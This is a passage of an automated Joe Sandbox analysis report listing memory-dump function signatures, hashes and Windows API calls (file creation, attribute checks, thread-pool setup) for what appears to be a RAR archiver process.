                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: wcschr
                                                            • String ID: MCAOmcao$MCAOmcao
                                                            • API String ID: 1497570035-1725859250
                                                            • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                            • Instruction ID: 61a86fea804ad8d4239bbcf60dfcefd08012dc4fc821e5ffc7fc0d55fe98f77f
                                                            • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                            • Instruction Fuzzy Hash: F6419212D1CD8380FA30BB2045515BED251AF50BA4FD84435EA7E062E6FE2DF859DB31
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32 ref: 00007FF71D2D359E
                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF71D2D35E6
                                                              • Part of subcall function 00007FF71D2D30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF71D2D305D,?,?,?,?,?,?,?,?,00007FF71D2E4126,?,?,?,?,00000800), ref: 00007FF71D2D30F0
                                                              • Part of subcall function 00007FF71D2D30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF71D2E4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF71D2D3119
                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF71D2D3651
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AttributesFileswprintf$CurrentProcess
                                                            • String ID: %u.%03u
                                                            • API String ID: 2814246642-1114938957
                                                            • Opcode ID: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                            • Instruction ID: e9ecc64947147cbd1e98ed2542f980ee1ac0b249e66ae134e82cc865f8f93f76
                                                            • Opcode Fuzzy Hash: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                            • Instruction Fuzzy Hash: 17314B72A1CD8181E614AB24E5112AAE260F7847B4F901335E97E47BE1FE3CE50ECB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                            • String ID: U
                                                            • API String ID: 2456169464-4171548499
                                                            • Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                            • Instruction ID: ed98cdbc0cdb40eacc792d559ed49051fd3e05c0d80608bb202a93edbf6ee91d
                                                            • Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                            • Instruction Fuzzy Hash: CF41A272B1CA46C2DB21AF25E4443AAE7A1FB887A4F844035EE4D87784EF3CD449CB50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                            • String ID: csm
                                                            • API String ID: 2280078643-1018135373
                                                            • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                            • Instruction ID: 9647174405b56f0ee2e75de464c098f30639368137eb9bc994511dcfbd6bc7f8
                                                            • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                            • Instruction Fuzzy Hash: 0E21097A608A41C2E630AB15E04466EF7A1F788BB5F445239DE9D03B95DF3CE449CB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: wcschr$swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1303626722-3142399695
                                                            • Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                            • Instruction ID: 4e934c8a73f5f13b05cf1273325e460815e2d2630b503b5a2eb4b41f301879a9
                                                            • Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                            • Instruction Fuzzy Hash: 71116362A0CB4581EE247F119541069E371AF49BE0BA88535DF6E137D7FF3CE46A8610
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                            • Instruction ID: ec18620cd70899fccfbbac2095304bf2a50f3069497fe474df21d8eca64673bc
                                                            • Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                            • Instruction Fuzzy Hash: 9111DA32F19A4182F7509F25E4043A9B2A3EBD4BA8F588439CA4D07655EF3D945A8B50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                            • String ID:
                                                            • API String ID: 904936192-0
                                                            • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                            • Instruction ID: 2dff037f2c89b74a30a270817ec26321538c7ed0349a613262083369ed70632f
                                                            • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                            • Instruction Fuzzy Hash: B451D176A09A81C5EB50DF29D4903ACF3A1FB84BA4F848235DE5E47794EF78D119CB20
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF71D2CF6FC,00000000,?,?,?,?,00007FF71D2D097D), ref: 00007FF71D2D38CD
                                                            • CreateFileW.KERNEL32(?,?,?,?,?,00007FF71D2CF6FC,00000000,?,?,?,?,00007FF71D2D097D,?,?,00000000), ref: 00007FF71D2D391F
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00007FF71D2CF6FC,00000000,?,?,?,?,00007FF71D2D097D,?,?,00000000), ref: 00007FF71D2D399B
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00007FF71D2CF6FC,00000000,?,?,?,?,00007FF71D2D097D,?,?,00000000), ref: 00007FF71D2D39A6
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                            • Instruction ID: a27bfc952e0d4b0e709a3ef46a44b4372ac86a00d0a47031c163d30024f17614
                                                            • Opcode Fuzzy Hash: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                            • Instruction Fuzzy Hash: 2A41C433A0CE4142EA50AB51E4217BAE6A1BB857B4F904235EEAD477D4FE7CD40D8F10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 932687459-0
                                                            • Opcode ID: 9dd97df182f14c0727483b3e7253ad47afb665d8a3a098e21309c6c8203fd826
                                                            • Instruction ID: a3aa9ba7b62b6585ecb0f8d71e028f54e9899b959c04e0b9e165b7fb2a963ff5
                                                            • Opcode Fuzzy Hash: 9dd97df182f14c0727483b3e7253ad47afb665d8a3a098e21309c6c8203fd826
                                                            • Instruction Fuzzy Hash: A641C471A0CED2C5EB61BA20D0503BDE394EB44BA4F98443ADB4D06A99EF6CE4498730
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 4141327611-0
                                                            • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                            • Instruction ID: 59a6b5a73e684288661be41c4daf8a490b133ff5d4f1c93d5954db948c73563f
                                                            • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                            • Instruction Fuzzy Hash: 3341533290DB43C6FB66AB519440379E6A1AF40BB0F984139DA49466D5EF2CE449CF20
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,00007FF71D2B86CB,?,?,?,00007FF71D2BA5CB,?,?,00000000,?,?,00000040,?,?,00007FF71D2B2DF9), ref: 00007FF71D2CD09D
                                                            • CreateFileW.KERNEL32(?,00007FF71D2B86CB,?,?,?,00007FF71D2BA5CB,?,?,00000000,?,?,00000040,?,?,00007FF71D2B2DF9), ref: 00007FF71D2CD0E5
                                                            • CreateFileW.KERNEL32(?,00007FF71D2B86CB,?,?,?,00007FF71D2BA5CB,?,?,00000000,?,?,00000040,?,?,00007FF71D2B2DF9), ref: 00007FF71D2CD114
                                                            • CreateFileW.KERNEL32(?,00007FF71D2B86CB,?,?,?,00007FF71D2BA5CB,?,?,00000000,?,?,00000040,?,?,00007FF71D2B2DF9), ref: 00007FF71D2CD15C
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                            • Instruction ID: 28135bfcfff4cd3fa45d96432e05821daa75961e0de84a5cc87b23f677eb57f6
                                                            • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                            • Instruction Fuzzy Hash: 51315E32618B4582E7609F15E55476AB7A0F789BB8F904328EAAC07BC8DF3CD4098F54
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CurrentPriorityThread$ClassProcess
                                                            • String ID:
                                                            • API String ID: 1171435874-0
                                                            • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                            • Instruction ID: 8f73cdcadd34d404879ecb24af9fa0af5b8d23f90818bdd89ab98b3fd35e3060
                                                            • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                            • Instruction Fuzzy Hash: 96113331E0CA42C6F664A710D5952BCE261EB54760FA04438C61917685FF2CBC4D8A24
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$abort
                                                            • String ID:
                                                            • API String ID: 1447195878-0
                                                            • Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                            • Instruction ID: 3250902fa097ebd14982b7e2a42884fae8cf0e323dfc7f35271e3029fe757659
                                                            • Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                            • Instruction Fuzzy Hash: 9F011730F0DE03C2FA98B7719655139D2A24F48BA0F98553CD91E06BD6FE6DB84D4E60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
